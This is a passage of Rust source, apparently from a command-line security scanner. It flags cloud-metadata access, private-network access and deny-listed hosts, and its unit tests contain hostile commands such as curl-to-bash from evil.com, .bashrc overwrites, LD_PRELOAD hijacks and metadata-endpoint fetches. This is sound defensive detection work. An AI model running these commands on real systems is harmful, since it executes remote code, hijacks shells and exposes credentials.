1135/// Cloud metadata endpoint IPs that expose instance credentials.
1136const METADATA_ENDPOINTS: &[&str] = &["169.254.169.254", "100.100.100.200"];
1137
1138fn check_host_for_network_issues(arg: &str, findings: &mut Vec<Finding>) {
1139    if let Some(host) = extract_host_from_arg(arg) {
1140        if METADATA_ENDPOINTS.contains(&host.as_str()) {
1141            findings.push(Finding {
1142                rule_id: RuleId::MetadataEndpoint,
1143                severity: Severity::Critical,
1144                title: format!("Cloud metadata endpoint access: {host}"),
1145                description: format!(
1146                    "Command accesses cloud metadata endpoint {host}, \
1147                     which can expose instance credentials and sensitive configuration"
1148                ),
1149                evidence: vec![Evidence::Url {
1150                    raw: arg.to_string(),
1151                }],
1152                human_view: None,
1153                agent_view: None,
1154                mitre_id: None,
1155                custom_rule_id: None,
1156            });
1157        } else if is_private_ip(&host) {
1158            findings.push(Finding {
1159                rule_id: RuleId::PrivateNetworkAccess,
1160                severity: Severity::High,
1161                title: format!("Private network access: {host}"),
1162                description: format!(
1163                    "Command accesses private network address {host}, \
1164                     which may indicate SSRF or lateral movement"
1165                ),
1166                evidence: vec![Evidence::Url {
1167                    raw: arg.to_string(),
1168                }],
1169                human_view: None,
1170                agent_view: None,
1171                mitre_id: None,
1172                custom_rule_id: None,
1173            });
1174        }
1175    }
1176}
1177
1178fn check_network_destination(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1179    for segment in segments {
1180        let Some(ref cmd) = segment.command else {
1181            continue;
1182        };
1183        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1184        if !is_source_command(&cmd_base) {
1185            continue;
1186        }
1187
1188        for arg in &segment.args {
1189            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1190            if trimmed.starts_with('-') {
1191                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1192                if let Some((_flag, value)) = trimmed.split_once('=') {
1193                    check_host_for_network_issues(value, findings);
1194                }
1195                continue;
1196            }
1197
1198            check_host_for_network_issues(trimmed, findings);
1199        }
1200    }
1201}
1202
1203/// Extract a host/IP from a URL-like command argument.
1204fn extract_host_from_arg(arg: &str) -> Option<String> {
1205    // URL with scheme: http://HOST[:PORT]/path
1206    if let Some(scheme_end) = arg.find("://") {
1207        let after_scheme = &arg[scheme_end + 3..];
1208        // Strip userinfo (anything before @)
1209        let after_userinfo = if let Some(at_idx) = after_scheme.find('@') {
1210            &after_scheme[at_idx + 1..]
1211        } else {
1212            after_scheme
1213        };
1214        // Get host:port (before first /)
1215        let host_port = after_userinfo.split('/').next().unwrap_or(after_userinfo);
1216        let host = strip_port(host_port);
1217        // Reject obviously invalid hosts (malformed brackets, embedded paths)
1218        if host.is_empty() || host.contains('/') || host.contains('[') {
1219            return None;
1220        }
1221        return Some(host);
1222    }
1223
1224    // Bare host/IP: "169.254.169.254/path" or just "169.254.169.254"
1225    let host_part = arg.split('/').next().unwrap_or(arg);
1226    let host = strip_port(host_part);
1227
1228    // Accept valid IPv4 addresses for bare hosts (no scheme)
1229    if host.parse::<std::net::Ipv4Addr>().is_ok() {
1230        return Some(host);
1231    }
1232
1233    // Accept bracketed IPv6: [::1]
1234    if host_part.starts_with('[') {
1235        if let Some(bracket_end) = host_part.find(']') {
1236            let ipv6 = &host_part[1..bracket_end];
1237            if ipv6.parse::<std::net::Ipv6Addr>().is_ok() {
1238                return Some(ipv6.to_string());
1239            }
1240        }
1241    }
1242
1243    None
1244}
1245
1246/// Strip port number from a host:port string, handling IPv6 brackets.
1247fn strip_port(host_port: &str) -> String {
1248    // Handle IPv6: [::1]:8080
1249    if host_port.starts_with('[') {
1250        if let Some(bracket_end) = host_port.find(']') {
1251            return host_port[1..bracket_end].to_string();
1252        }
1253    }
1254    // Don't strip from unbracketed IPv6 (multiple colons)
1255    let colon_count = host_port.chars().filter(|&c| c == ':').count();
1256    if colon_count > 1 {
1257        return host_port.to_string(); // IPv6, don't strip
1258    }
1259    // IPv4 or hostname with single colon: strip trailing :PORT
1260    if let Some(colon_idx) = host_port.rfind(':') {
1261        if host_port[colon_idx + 1..].parse::<u16>().is_ok() {
1262            return host_port[..colon_idx].to_string();
1263        }
1264    }
1265    host_port.to_string()
1266}
1267
1268/// Check if an IPv4 address is in a private/reserved range (excluding loopback).
1269fn is_private_ip(host: &str) -> bool {
1270    if let Ok(ip) = host.parse::<std::net::Ipv4Addr>() {
1271        let octets = ip.octets();
1272        // Loopback (127.x) is excluded — local traffic has no SSRF/lateral movement risk.
1273        if octets[0] == 127 {
1274            return false;
1275        }
1276        return octets[0] == 10
1277            || (octets[0] == 172 && (16..=31).contains(&octets[1]))
1278            || (octets[0] == 192 && octets[1] == 168);
1279    }
1280    false
1281}
1282
1283/// POSIX fetch commands — appropriate for both `tirith run` and `vet` hints.
1284const POSIX_FETCH_COMMANDS: &[&str] = &["curl", "wget", "http", "https", "xh", "fetch"];
1285
1286/// PowerShell fetch commands — appropriate for `vet` hints only
1287/// (`tirith run` doesn't support PowerShell interpreter flows).
1288const POWERSHELL_FETCH_COMMANDS: &[&str] =
1289    &["iwr", "irm", "invoke-webrequest", "invoke-restmethod"];
1290
1291/// Source commands that are not URL-fetching (no vet/tirith-run hints).
1292const NON_FETCH_SOURCE_COMMANDS: &[&str] = &["scp", "rsync"];
1293
1294fn is_source_command(cmd: &str) -> bool {
1295    POSIX_FETCH_COMMANDS.contains(&cmd)
1296        || POWERSHELL_FETCH_COMMANDS.contains(&cmd)
1297        || NON_FETCH_SOURCE_COMMANDS.contains(&cmd)
1298}
1299
1300/// All URL-fetching commands (union of POSIX + PowerShell).
1301fn is_url_fetch_command(cmd: &str) -> bool {
1302    POSIX_FETCH_COMMANDS.contains(&cmd) || POWERSHELL_FETCH_COMMANDS.contains(&cmd)
1303}
1304
1305/// Whether this fetch source supports `tirith run` hints.
1306/// True only for POSIX fetch commands (`tirith run` is a shell-script runner).
1307fn supports_tirith_run_hint(cmd: &str) -> bool {
1308    POSIX_FETCH_COMMANDS.contains(&cmd)
1309}
1310
1311/// Check if string starts with http:// or https:// (case-insensitive scheme).
1312fn starts_with_http_scheme(s: &str) -> bool {
1313    let b = s.as_bytes();
1314    (b.len() >= 8 && b[..8].eq_ignore_ascii_case(b"https://"))
1315        || (b.len() >= 7 && b[..7].eq_ignore_ascii_case(b"http://"))
1316}
1317
1318/// Strip control characters (0x00–0x1F, 0x7F) from a URL so it cannot inject
1319/// ANSI escapes, newlines, or other terminal-interpreted sequences into the
1320/// finding description displayed to the user.
1321fn sanitize_url_for_display(url: &str) -> String {
1322    url.chars().filter(|&c| !c.is_ascii_control()).collect()
1323}
1324
1325/// Extract the first URL from command arguments.
1326fn extract_url_from_args(args: &[String], shell: ShellType) -> Option<String> {
1327    for arg in args {
1328        let normalized = normalize_shell_token(arg.trim(), shell);
1329
1330        if starts_with_http_scheme(&normalized) {
1331            return Some(normalized);
1332        }
1333
1334        // Check --flag=<url> forms (e.g., --url=https://...)
1335        if let Some((_, val)) = normalized.split_once('=') {
1336            if starts_with_http_scheme(val) {
1337                return Some(val.to_string());
1338            }
1339        }
1340    }
1341    None
1342}
1343
1344/// Check command destination hosts against policy network deny/allow lists (Team feature).
1345///
1346/// For each source command (curl, wget, etc.), extracts the destination host and
1347/// checks against deny/allow lists. Allow takes precedence (exempts from deny).
1348pub fn check_network_policy(
1349    input: &str,
1350    shell: ShellType,
1351    deny: &[String],
1352    allow: &[String],
1353) -> Vec<Finding> {
1354    if deny.is_empty() {
1355        return Vec::new();
1356    }
1357
1358    let segments = tokenize::tokenize(input, shell);
1359    let mut findings = Vec::new();
1360
1361    for segment in &segments {
1362        let Some(ref cmd) = segment.command else {
1363            continue;
1364        };
1365        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1366        if !is_source_command(&cmd_base) {
1367            continue;
1368        }
1369
1370        for arg in &segment.args {
1371            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1372            if trimmed.starts_with('-') {
1373                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1374                if let Some((_flag, value)) = trimmed.split_once('=') {
1375                    if let Some(host) = extract_host_from_arg(value) {
1376                        if matches_network_list(&host, allow) {
1377                            continue;
1378                        }
1379                        if matches_network_list(&host, deny) {
1380                            findings.push(Finding {
1381                                rule_id: RuleId::CommandNetworkDeny,
1382                                severity: Severity::Critical,
1383                                title: format!("Network destination denied by policy: {host}"),
1384                                description: format!(
1385                                    "Command accesses {host}, which is on the network deny list"
1386                                ),
1387                                evidence: vec![Evidence::Url {
1388                                    raw: value.to_string(),
1389                                }],
1390                                human_view: None,
1391                                agent_view: None,
1392                                mitre_id: None,
1393                                custom_rule_id: None,
1394                            });
1395                            continue;
1396                        }
1397                    }
1398                }
1399                continue;
1400            }
1401
1402            if let Some(host) = extract_host_from_arg(trimmed) {
1403                // Allow list exempts from deny
1404                if matches_network_list(&host, allow) {
1405                    continue;
1406                }
1407                if matches_network_list(&host, deny) {
1408                    findings.push(Finding {
1409                        rule_id: RuleId::CommandNetworkDeny,
1410                        severity: Severity::Critical,
1411                        title: format!("Network destination denied by policy: {host}"),
1412                        description: format!(
1413                            "Command accesses {host}, which is on the network deny list"
1414                        ),
1415                        evidence: vec![Evidence::Url {
1416                            raw: trimmed.to_string(),
1417                        }],
1418                        human_view: None,
1419                        agent_view: None,
1420                        mitre_id: None,
1421                        custom_rule_id: None,
1422                    });
1423                    return findings;
1424                }
1425            }
1426        }
1427    }
1428
1429    findings
1430}
1431
1432/// Check if a host matches any entry in a network list.
1433///
1434/// Supports exact hostname match, suffix match (`.example.com` matches
1435/// `sub.example.com`), and CIDR match for IPv4 addresses.
1436fn matches_network_list(host: &str, list: &[String]) -> bool {
1437    for entry in list {
1438        // CIDR match: "10.0.0.0/8"
1439        if entry.contains('/') {
1440            if let Some(matched) = cidr_contains(host, entry) {
1441                if matched {
1442                    return true;
1443                }
1444                continue;
1445            }
1446        }
1447
1448        // Exact match
1449        if host.eq_ignore_ascii_case(entry) {
1450            return true;
1451        }
1452
1453        // Suffix match: entry "example.com" matches "sub.example.com"
1454        if host.len() > entry.len()
1455            && host.ends_with(entry.as_str())
1456            && host.as_bytes()[host.len() - entry.len() - 1] == b'.'
1457        {
1458            return true;
1459        }
1460    }
1461    false
1462}
1463
1464/// Check if an IPv4 address is within a CIDR range.
1465/// Returns `Some(true/false)` if both parse, `None` if either fails.
1466fn cidr_contains(host: &str, cidr: &str) -> Option<bool> {
1467    let parts: Vec<&str> = cidr.splitn(2, '/').collect();
1468    if parts.len() != 2 {
1469        return None;
1470    }
1471    let network: std::net::Ipv4Addr = parts[0].parse().ok()?;
1472    let prefix_len: u32 = parts[1].parse().ok()?;
1473    if prefix_len > 32 {
1474        return None;
1475    }
1476    let host_ip: std::net::Ipv4Addr = host.parse().ok()?;
1477
1478    let mask = if prefix_len == 0 {
1479        0u32
1480    } else {
1481        !0u32 << (32 - prefix_len)
1482    };
1483    let net_bits = u32::from(network) & mask;
1484    let host_bits = u32::from(host_ip) & mask;
1485
1486    Some(net_bits == host_bits)
1487}
1488
1489#[cfg(test)]
1490mod tests {
1491    use super::*;
1492
1493    /// Helper: run `check()` with no cwd and Exec context (the common case for tests).
1494    fn check_default(input: &str, shell: ShellType) -> Vec<Finding> {
1495        check(input, shell, None, ScanContext::Exec)
1496    }
1497
1498    #[test]
1499    fn test_pipe_sudo_flags_detected() {
1500        let findings = check_default(
1501            "curl https://evil.com | sudo -u root bash",
1502            ShellType::Posix,
1503        );
1504        assert!(
1505            findings
1506                .iter()
1507                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1508            "should detect pipe through sudo -u root bash"
1509        );
1510    }
1511
1512    #[test]
1513    fn test_pipe_sudo_long_flag_detected() {
1514        let findings = check_default(
1515            "curl https://evil.com | sudo --user=root bash",
1516            ShellType::Posix,
1517        );
1518        assert!(
1519            findings
1520                .iter()
1521                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1522            "should detect pipe through sudo --user=root bash"
1523        );
1524    }
1525
1526    #[test]
1527    fn test_pipe_env_var_assignment_detected() {
1528        let findings = check_default("curl https://evil.com | env VAR=1 bash", ShellType::Posix);
1529        assert!(
1530            findings
1531                .iter()
1532                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1533            "should detect pipe through env VAR=1 bash"
1534        );
1535    }
1536
1537    #[test]
1538    fn test_pipe_env_u_flag_detected() {
1539        let findings = check_default("curl https://evil.com | env -u HOME bash", ShellType::Posix);
1540        assert!(
1541            findings
1542                .iter()
1543                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1544            "should detect pipe through env -u HOME bash"
1545        );
1546    }
1547
1548    #[test]
1549    fn test_dotfile_overwrite_detected() {
1550        let cases = [
1551            "echo malicious > ~/.bashrc",
1552            "echo malicious >> ~/.bashrc",
1553            "curl https://evil.com > ~/.bashrc",
1554            "cat payload > ~/.profile",
1555            "echo test > $HOME/.bashrc",
1556        ];
1557        for input in &cases {
1558            let findings = check_default(input, ShellType::Posix);
1559            eprintln!(
1560                "INPUT: {:?} -> findings: {:?}",
1561                input,
1562                findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
1563            );
1564            assert!(
1565                findings
1566                    .iter()
1567                    .any(|f| f.rule_id == RuleId::DotfileOverwrite),
1568                "should detect dotfile overwrite in: {input}",
1569            );
1570        }
1571    }
1572
1573    #[test]
1574    fn test_pipe_env_s_flag_detected() {
1575        let findings = check_default("curl https://evil.com | env -S bash -x", ShellType::Posix);
1576        assert!(
1577            findings
1578                .iter()
1579                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1580            "should detect pipe through env -S bash -x"
1581        );
1582    }
1583
1584    #[test]
1585    fn test_pipe_sudo_env_detected() {
1586        let findings = check_default(
1587            "curl https://evil.com | sudo env VAR=1 bash",
1588            ShellType::Posix,
1589        );
1590        assert!(
1591            findings
1592                .iter()
1593                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
1594            "should detect pipe through sudo env VAR=1 bash"
1595        );
1596    }
1597
1598    #[test]
1599    fn test_httpie_pipe_bash() {
1600        let findings = check_default("http https://evil.com/install.sh | bash", ShellType::Posix);
1601        assert!(
1602            findings
1603                .iter()
1604                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
1605            "should detect HTTPie pipe to bash"
1606        );
1607    }
1608
1609    #[test]
1610    fn test_httpie_https_pipe_bash() {
1611        let findings = check_default("https https://evil.com/install.sh | bash", ShellType::Posix);
1612        assert!(
1613            findings
1614                .iter()
1615                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
1616            "should detect HTTPie https pipe to bash"
1617        );
1618    }
1619
1620    #[test]
1621    fn test_xh_pipe_bash() {
1622        let findings = check_default("xh https://evil.com/install.sh | bash", ShellType::Posix);
1623        assert!(
1624            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
1625            "should detect xh pipe to bash"
1626        );
1627    }
1628
1629    #[test]
1630    fn test_xh_pipe_sudo_bash() {
1631        let findings = check_default(
1632            "xh https://evil.com/install.sh | sudo bash",
1633            ShellType::Posix,
1634        );
1635        assert!(
1636            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
1637            "should detect xh pipe to sudo bash"
1638        );
1639    }
1640
1641    #[test]
1642    fn test_httpie_no_pipe_safe() {
1643        let findings = check_default("http https://example.com/api/data", ShellType::Posix);
1644        assert!(
1645            !findings
1646                .iter()
1647                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
1648            "HTTPie without pipe should not trigger"
1649        );
1650    }
1651
1652    #[test]
1653    fn test_xh_no_pipe_safe() {
1654        let findings = check_default("xh https://example.com/api/data", ShellType::Posix);
1655        assert!(
1656            !findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
1657            "xh without pipe should not trigger"
1658        );
1659    }
1660
1661    #[test]
1662    fn test_export_ld_preload() {
1663        let findings = check_default("export LD_PRELOAD=/evil/lib.so", ShellType::Posix);
1664        assert!(
1665            findings
1666                .iter()
1667                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
1668            "should detect LD_PRELOAD export"
1669        );
1670    }
1671
1672    #[test]
1673    fn test_export_bash_env() {
1674        let findings = check_default("export BASH_ENV=/tmp/evil.sh", ShellType::Posix);
1675        assert!(
1676            findings
1677                .iter()
1678                .any(|f| f.rule_id == RuleId::ShellInjectionEnv),
1679            "should detect BASH_ENV export"
1680        );
1681    }
1682
1683    #[test]
1684    fn test_export_pythonpath() {
1685        let findings = check_default("export PYTHONPATH=/evil/modules", ShellType::Posix);
1686        assert!(
1687            findings
1688                .iter()
1689                .any(|f| f.rule_id == RuleId::InterpreterHijackEnv),
1690            "should detect PYTHONPATH export"
1691        );
1692    }
1693
1694    #[test]
1695    fn test_export_openai_key() {
1696        let findings = check_default("export OPENAI_API_KEY=sk-abc123", ShellType::Posix);
1697        assert!(
1698            findings
1699                .iter()
1700                .any(|f| f.rule_id == RuleId::SensitiveEnvExport),
1701            "should detect OPENAI_API_KEY export"
1702        );
1703    }
1704
1705    #[test]
1706    fn test_export_path_safe() {
1707        let findings = check_default("export PATH=/usr/bin:$PATH", ShellType::Posix);
1708        assert!(
1709            !findings.iter().any(|f| matches!(
1710                f.rule_id,
1711                RuleId::CodeInjectionEnv
1712                    | RuleId::ShellInjectionEnv
1713                    | RuleId::InterpreterHijackEnv
1714                    | RuleId::SensitiveEnvExport
1715            )),
1716            "export PATH should not trigger env var detection"
1717        );
1718    }
1719
1720    #[test]
1721    fn test_env_ld_preload_cmd() {
1722        let findings = check_default(
1723            "env LD_PRELOAD=/evil/lib.so /usr/bin/target",
1724            ShellType::Posix,
1725        );
1726        assert!(
1727            findings
1728                .iter()
1729                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
1730            "should detect LD_PRELOAD via env command"
1731        );
1732    }
1733
1734    #[test]
1735    fn test_curl_metadata_endpoint() {
1736        let findings = check_default(
1737            "curl http://169.254.169.254/latest/meta-data",
1738            ShellType::Posix,
1739        );
1740        assert!(
1741            findings
1742                .iter()
1743                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
1744            "should detect AWS metadata endpoint"
1745        );
1746    }
1747
1748    #[test]
1749    fn test_curl_private_network() {
1750        let findings = check_default("curl http://10.0.0.1/internal/api", ShellType::Posix);
1751        assert!(
1752            findings
1753                .iter()
1754                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
1755            "should detect private network access"
1756        );
1757    }
1758
1759    #[test]
1760    fn test_curl_public_ip_safe() {
1761        let findings = check_default("curl http://8.8.8.8/dns-query", ShellType::Posix);
1762        assert!(
1763            !findings.iter().any(|f| matches!(
1764                f.rule_id,
1765                RuleId::MetadataEndpoint | RuleId::PrivateNetworkAccess
1766            )),
1767            "public IP should not trigger network destination detection"
1768        );
1769    }
1770
1771    #[test]
1772    fn test_metadata_bare_ip() {
1773        let findings = check_default("curl 169.254.169.254/latest/meta-data", ShellType::Posix);
1774        assert!(
1775            findings
1776                .iter()
1777                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
1778            "should detect bare IP metadata endpoint"
1779        );
1780    }
1781
1782    #[test]
1783    fn test_extract_host_from_url() {
1784        assert_eq!(
1785            extract_host_from_arg("http://169.254.169.254/latest"),
1786            Some("169.254.169.254".to_string())
1787        );
1788        assert_eq!(
1789            extract_host_from_arg("http://10.0.0.1:8080/api"),
1790            Some("10.0.0.1".to_string())
1791        );
1792        assert_eq!(
1793            extract_host_from_arg("169.254.169.254/path"),
1794            Some("169.254.169.254".to_string())
1795        );
1796        assert_eq!(
1797            extract_host_from_arg("8.8.8.8"),
1798            Some("8.8.8.8".to_string())
1799        );
1800        assert_eq!(extract_host_from_arg("-H"), None);
1801        assert_eq!(extract_host_from_arg("output.txt"), None);
1802    }
1803
1804    // --- Network policy tests ---
1805
1806    #[test]
1807    fn test_network_policy_deny_exact() {
1808        let deny = vec!["evil.com".to_string()];
1809        let allow = vec![];
1810        let findings = check_network_policy(
1811            "curl https://evil.com/data",
1812            ShellType::Posix,
1813            &deny,
1814            &allow,
1815        );
1816        assert_eq!(findings.len(), 1);
1817        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
1818    }
1819
1820    #[test]
1821    fn test_network_policy_deny_subdomain() {
1822        let deny = vec!["evil.com".to_string()];
1823        let allow = vec![];
1824        let findings = check_network_policy(
1825            "wget https://sub.evil.com/data",
1826            ShellType::Posix,
1827            &deny,
1828            &allow,
1829        );
1830        assert_eq!(findings.len(), 1);
1831        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
1832    }
1833
1834    #[test]
1835    fn test_network_policy_deny_cidr() {
1836        let deny = vec!["10.0.0.0/8".to_string()];
1837        let allow = vec![];
1838        let findings =
1839            check_network_policy("curl http://10.1.2.3/api", ShellType::Posix, &deny, &allow);
1840        assert_eq!(findings.len(), 1);
1841        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
1842    }
1843
1844    #[test]
1845    fn test_network_policy_allow_exempts() {
1846        let deny = vec!["evil.com".to_string()];
1847        let allow = vec!["safe.evil.com".to_string()];
1848        let findings = check_network_policy(
1849            "curl https://safe.evil.com/data",
1850            ShellType::Posix,
1851            &deny,
1852            &allow,
1853        );
1854        assert_eq!(findings.len(), 0, "allow list should exempt from deny");
1855    }
1856
1857    #[test]
1858    fn test_network_policy_no_match() {
1859        let deny = vec!["evil.com".to_string()];
1860        let allow = vec![];
1861        let findings = check_network_policy(
1862            "curl https://example.com/data",
1863            ShellType::Posix,
1864            &deny,
1865            &allow,
1866        );
1867        assert_eq!(findings.len(), 0);
1868    }
1869
1870    #[test]
1871    fn test_network_policy_empty_deny() {
1872        let deny = vec![];
1873        let allow = vec![];
1874        let findings =
1875            check_network_policy("curl https://evil.com", ShellType::Posix, &deny, &allow);
1876        assert_eq!(
1877            findings.len(),
1878            0,
1879            "empty deny list should produce no findings"
1880        );
1881    }
1882
1883    #[test]
1884    fn test_cidr_contains() {
1885        assert_eq!(cidr_contains("10.0.0.1", "10.0.0.0/8"), Some(true));
1886        assert_eq!(cidr_contains("10.255.255.255", "10.0.0.0/8"), Some(true));
1887        assert_eq!(cidr_contains("11.0.0.1", "10.0.0.0/8"), Some(false));
1888        assert_eq!(cidr_contains("192.168.1.1", "192.168.0.0/16"), Some(true));
1889        assert_eq!(cidr_contains("192.169.1.1", "192.168.0.0/16"), Some(false));
1890        assert_eq!(cidr_contains("not-an-ip", "10.0.0.0/8"), None);
1891        assert_eq!(cidr_contains("10.0.0.1", "invalid"), None);
1892    }
1893
1894    #[test]
1895    fn test_matches_network_list_hostname() {
1896        let list = vec!["evil.com".to_string(), "bad.org".to_string()];
1897        assert!(matches_network_list("evil.com", &list));
1898        assert!(matches_network_list("sub.evil.com", &list));
1899        assert!(!matches_network_list("notevil.com", &list));
1900        assert!(!matches_network_list("good.com", &list));
1901    }
1902
1903    #[test]
1904    fn test_flag_value_url_detected_in_network_policy() {
1905        let deny = vec!["evil.com".to_string()];
1906        let allow = vec![];
1907        let findings = check_network_policy(
1908            "curl --url=http://evil.com/data",
1909            ShellType::Posix,
1910            &deny,
1911            &allow,
1912        );
1913        assert_eq!(findings.len(), 1, "should detect denied host in --flag=URL");
1914        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
1915    }
1916
1917    #[test]
1918    fn test_flag_value_url_metadata_endpoint() {
1919        let findings = check(
1920            "curl --url=http://169.254.169.254/latest/meta-data",
1921            ShellType::Posix,
1922            None,
1923            ScanContext::Exec,
1924        );
1925        assert!(
1926            findings
1927                .iter()
1928                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
1929            "should detect metadata endpoint in --flag=URL"
1930        );
1931    }
1932
1933    #[test]
1934    fn test_flag_value_url_private_network() {
1935        let findings = check(
1936            "curl --url=http://10.0.0.1/internal",
1937            ShellType::Posix,
1938            None,
1939            ScanContext::Exec,
1940        );
1941        assert!(
1942            findings
1943                .iter()
1944                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
1945            "should detect private network in --flag=URL"
1946        );
1947    }
1948
1949    #[test]
1950    fn test_strip_port_unbracketed_ipv6() {
1951        assert_eq!(strip_port("fe80::1"), "fe80::1");
1952    }
1953
1954    #[test]
1955    fn test_vet_not_configured_fires_without_supply_chain() {
1956        let dir = tempfile::tempdir().unwrap();
1957        let cwd = dir.path().to_str().unwrap();
1958        let findings = check(
1959            "cargo install serde_json",
1960            ShellType::Posix,
1961            Some(cwd),
1962            ScanContext::Exec,
1963        );
1964        assert!(findings
1965            .iter()
1966            .any(|f| f.rule_id == RuleId::VetNotConfigured));
1967    }
1968
1969    #[test]
1970    fn test_vet_not_configured_suppressed_with_supply_chain() {
1971        let dir = tempfile::tempdir().unwrap();
1972        let sc_dir = dir.path().join("supply-chain");
1973        std::fs::create_dir_all(&sc_dir).unwrap();
1974        std::fs::write(sc_dir.join("config.toml"), "").unwrap();
1975        let cwd = dir.path().to_str().unwrap();
1976        let findings = check(
1977            "cargo install serde_json",
1978            ShellType::Posix,
1979            Some(cwd),
1980            ScanContext::Exec,
1981        );
1982        assert!(!findings
1983            .iter()
1984            .any(|f| f.rule_id == RuleId::VetNotConfigured));
1985    }
1986
1987    #[test]
1988    fn test_vet_not_configured_skips_non_install() {
1989        let dir = tempfile::tempdir().unwrap();
1990        let cwd = dir.path().to_str().unwrap();
1991        let findings = check(
1992            "cargo build",
1993            ShellType::Posix,
1994            Some(cwd),
1995            ScanContext::Exec,
1996        );
1997        assert!(!findings
1998            .iter()
1999            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2000    }
2001
2002    #[test]
2003    fn test_vet_detects_cargo_with_flags() {
2004        let dir = tempfile::tempdir().unwrap();
2005        let cwd = dir.path().to_str().unwrap();
2006        let f1 = check(
2007            "cargo --locked install serde",
2008            ShellType::Posix,
2009            Some(cwd),
2010            ScanContext::Exec,
2011        );
2012        assert!(f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2013        let f2 = check(
2014            "cargo +nightly add tokio",
2015            ShellType::Posix,
2016            Some(cwd),
2017            ScanContext::Exec,
2018        );
2019        assert!(f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2020        let f3 = check(
2021            "cargo -Z sparse-registry install serde",
2022            ShellType::Posix,
2023            Some(cwd),
2024            ScanContext::Exec,
2025        );
2026        assert!(f3.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2027    }
2028
2029    #[test]
2030    fn test_vet_skipped_in_paste_context() {
2031        let dir = tempfile::tempdir().unwrap();
2032        let cwd = dir.path().to_str().unwrap();
2033        let findings = check(
2034            "cargo install serde_json",
2035            ShellType::Posix,
2036            Some(cwd),
2037            ScanContext::Paste,
2038        );
2039        assert!(!findings
2040            .iter()
2041            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2042    }
2043
2044    #[test]
2045    fn test_vet_no_false_positive_on_non_install_subcommand() {
2046        let dir = tempfile::tempdir().unwrap();
2047        let cwd = dir.path().to_str().unwrap();
2048        let f1 = check(
2049            "cargo test --package add",
2050            ShellType::Posix,
2051            Some(cwd),
2052            ScanContext::Exec,
2053        );
2054        assert!(!f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2055        let f2 = check(
2056            "cargo build install",
2057            ShellType::Posix,
2058            Some(cwd),
2059            ScanContext::Exec,
2060        );
2061        assert!(!f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2062    }
2063
2064    #[test]
2065    fn test_vet_detects_cargo_exe_windows_path() {
2066        let dir = tempfile::tempdir().unwrap();
2067        let cwd = dir.path().to_str().unwrap();
2068        let f1 = check(
2069            r"C:\Users\dev\.cargo\bin\cargo.exe install serde",
2070            ShellType::PowerShell,
2071            Some(cwd),
2072            ScanContext::Exec,
2073        );
2074        assert!(
2075            f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
2076            "should detect cargo.exe with Windows backslash path"
2077        );
2078        let f2 = check(
2079            r"C:\Users\dev\.cargo\bin\CARGO.EXE install serde",
2080            ShellType::PowerShell,
2081            Some(cwd),
2082            ScanContext::Exec,
2083        );
2084        assert!(
2085            f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
2086            "should detect CARGO.EXE case-insensitively"
2087        );
2088    }
2089
2090    // ── normalize_shell_token unit tests ──
2091
2092    #[test]
2093    fn test_normalize_ansi_c_basic() {
2094        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
2095    }
2096
2097    #[test]
2098    fn test_normalize_ansi_c_hex() {
2099        assert_eq!(
2100            normalize_shell_token("$'\\x62\\x61\\x73\\x68'", ShellType::Posix),
2101            "bash"
2102        );
2103    }
2104
2105    #[test]
2106    fn test_normalize_ansi_c_octal() {
2107        assert_eq!(
2108            normalize_shell_token("$'\\142\\141\\163\\150'", ShellType::Posix),
2109            "bash"
2110        );
2111    }
2112
2113    #[test]
2114    fn test_normalize_ansi_c_octal_leading_zero() {
2115        // \057 = '/' (octal 057 = 47 decimal = '/')
2116        assert_eq!(
2117            normalize_shell_token("$'\\057bin\\057bash'", ShellType::Posix),
2118            "/bin/bash"
2119        );
2120    }
2121
2122    #[test]
2123    fn test_normalize_ansi_c_bare_zero() {
2124        // \0 alone (no following octal digits) should still be NUL
2125        assert_eq!(normalize_shell_token("$'a\\0b'", ShellType::Posix), "a\0b");
2126    }
2127
2128    #[test]
2129    fn test_normalize_ansi_c_unicode() {
2130        assert_eq!(
2131            normalize_shell_token("$'\\u0062ash'", ShellType::Posix),
2132            "bash"
2133        );
